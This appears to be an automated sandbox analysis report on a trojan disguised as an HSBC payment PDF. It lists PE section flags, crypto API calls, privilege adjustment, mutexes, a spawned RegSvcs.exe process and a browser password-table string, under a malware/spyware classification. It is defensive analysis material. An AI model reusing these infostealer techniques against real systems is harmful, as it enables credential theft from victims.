Source: 7zG.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.3.dr	Static PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.3.dr	Static PE information: Section: .rsrc ZLIB complexity 0.9989003576744956

Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@20/162@24/13

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_0046A06A GetLastError,FormatMessageW,

1_2_0046A06A

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_004581CB AdjustTokenPrivileges,CloseHandle,		1_2_004581CB
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		1_2_004587E1

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

1_2_0046B333

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

1_2_0047EE0D

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,

1_2_0046C397

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_00404E89

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

File created: C:\Users\user\AppData\Roaming\a0358cca38a50504.bin

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a0358cca38a50504-inf
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a0358cca38a505049e7986a9-b
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-a0358cca38a505049ea72c54-b

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

File created: C:\Users\user~1\AppData\Local\Temp\autF33C.tmp

Jump to behavior

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 0000000C.00000002.2618907093.00000000033BD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2611502749.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2611502749.0000000002485000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2611502749.0000000002493000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2611502749.00000000024A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2611502749.0000000002475000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: unknown	Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown	Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: unknown	Process created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
Source: unknown	Process created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
Source: unknown	Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknown	Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"	Jump to behavior

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: wininet.dll	Jump to behavior
